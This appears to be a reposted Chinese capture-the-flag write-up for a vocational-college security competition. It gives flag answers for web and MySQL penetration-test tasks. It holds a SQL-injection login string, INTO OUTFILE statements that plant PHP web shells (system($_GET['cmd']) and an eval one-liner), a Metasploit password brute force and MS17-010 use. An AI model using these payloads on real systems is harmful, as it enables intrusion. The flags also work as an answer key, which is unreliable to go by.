程序员最近都爱上了这个网站  程序员们快来瞅瞅吧!  it98k网:it98k.com

本站消息

站长简介/公众号

  出租广告位,需要合作请联系站长


+关注
已关注

分类  

暂无分类

标签  

暂无标签

日期归档  

全国职业院校技能大赛网络安全之web;mysql安全之综合渗透测试

发布于2022-06-27 20:11     阅读(1457)     评论(0)     点赞(8)     收藏(0)


**

最近新建了一个比赛讨论群,有意的可以进一下,扣扣群号为809706080

**

  1. 通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;
    在这里插入图片描述flag{htmlcode}

  2. 通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交; 在这里插入图片描述
    flag{vimbakswp}

  3. 通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;
    在这里插入图片描述
    flag{spider}

4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;
在这里插入图片描述
flag{sqlinject1}

5通过URL访问http://靶机IP/5,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;
用户名 admin 密码 ‘or’1’=’1
在这里插入图片描述
flag{wannengpwd}

  1. 通过URL访问http://靶机IP/6,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交;

在这里插入图片描述
flag{ipsrc}

MYSQL安全之综合渗透测试
1.利用渗透机场景kali中的工具确定MySQL的端口,将MySQL端口作为Flag值提交;
Flag:3358
在这里插入图片描述

2.管理者曾在web界面登陆数据库,并执行了select ‘<?php echo \'

\';system($_GET[\'cmd\']); echo \'
\'; ?>’ INTO OUTFILE 'C:/phpstudy/test1.php’语句,结合本执行语句使用dos命令查看服务器的详细配置信息,并将服务器的系统型号作为Flag值提交;

Flag:Bochs
在这里插入图片描述

Ms17-010
在这里插入图片描述

3.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将破解MySQL的密码所需的模块当作Flag值 (账户为root) 提交;
Flag:mysql_login
在这里插入图片描述

4.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将MySQL的密码当作Flag值 (账户为root) 提交;
Flag:zxcvbnm
在这里插入图片描述

5.利用上题中的数据库账户密码在登陆数据库,通过select ‘<?php @eval($_POST[admin]);?>’************ 'C:/phpstudy/shell.php’语句向服务器提交名为shell.php的一句话木马,将语句中*号的明文作为Flag值(*为大写字母或者空格)提交;
Flag:INTO OUTFILE
可以参考第二小题
在这里插入图片描述

6.使用菜刀连接上题中的shell.php,下载服务器根目录下的压缩包,将压缩包中的Flag值提交。
Flag:huaixiaohai
还是ms17-010,把压缩包下载到本地
在这里插入图片描述

根据提示密码时数字
在这里插入图片描述

爆破密码
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

原文链接:https://blog.csdn.net/qq_53365018/article/details/125123613




所属网站分类: 技术文章 > 博客

作者:爱出汗

链接:http://www.qianduanheidong.com/blog/article/377078/62d8a570f302905134e1/

来源:前端黑洞网

任何形式的转载都请注明出处,如有侵权 一经发现 必将追究其法律责任

8 0
收藏该文
已收藏

评论内容:(最多支持255个字符)